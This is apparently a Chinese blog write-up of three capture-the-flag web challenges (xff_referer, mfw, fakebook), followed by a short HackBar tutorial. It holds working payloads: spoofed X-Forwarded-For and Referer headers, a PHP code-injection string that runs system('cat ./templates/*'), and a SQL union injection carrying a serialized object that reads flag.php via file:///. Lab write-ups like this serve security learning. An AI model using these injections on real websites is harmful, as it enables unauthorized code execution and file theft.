攻防世界-xff_referer+mfw+fakebook

X-Forwarded-For:123.123.123.123
Referer:https://www.google.com
在这里插入图片描述
在这里插入图片描述

?page=%27).system(%27cat+./templates/*%27);//

在这里插入图片描述


fakebook


view.php?no=2%20union/**/select%201,2,3,%27O:8:"UserInfo":3:{s:4:"name";s:3:"123";s:3:"age";i:123;s:4:"blog";s:29:"file:///var/www/html/flag.php";}%27%20#

在这里插入图片描述

在这里插入图片描述

### 攻防世界 XFF Referer HackBar 使用教程 #### 1. X-Forwarded-For (XFF) 和 Referer 头简介 X-Forwarded-For (XFF) 是 HTTP 请求头的一部分,通常由代理服务器添加,用于标识客户端 IP 地址。Referer 头则告知服务器当前请求是从哪个 URL 发起的。这两个头部信息可以被拦截并篡改,从而实现伪造 IP 或来源页面的效果[^1]。 #### 2. 安装和配置 HackBar 插件 为了方便操作这些 HTTP 头部信息,推荐使用 HackBar 浏览器插件: - **获取 HackBar** - 可以从 GitHub 上找到无需 License 的版本进行下载[^3]。 - **安装过程** - 将下载好的文件夹解压缩; - 进入浏览器设置 -> 更多工具 -> 扩展程序; - 启用开发者模式,点击加载已解压的扩展程序; - 选择刚刚解压出来的目录完成加载; #### 3. 利用 HackBar 修改 XFFReferer 一旦成功安装好 HackBar 工具,在实际应用过程中就可以轻松更改上述两个重要的 HTTP 请求头字段了: ```bash # 设置自定义的 X-Forwarded-For 值 X-Forwarded-For: 123.123.123.123 # 自定义 Referer 字段的内容 Referer: http://example.com/ ``` 以上命令可以直接输入到 HackBar 提供的操作界面里执行,以此达到伪装真实访问源的目的[^4]。 #### 4. 注意事项 尽管能够利用此类技术手段来进行安全测试或学习研究,但在未经授权的情况下对他人网站实施任何形式的攻击都是违法行为,请务必遵守法律法规以及道德准则!
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安全专家1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值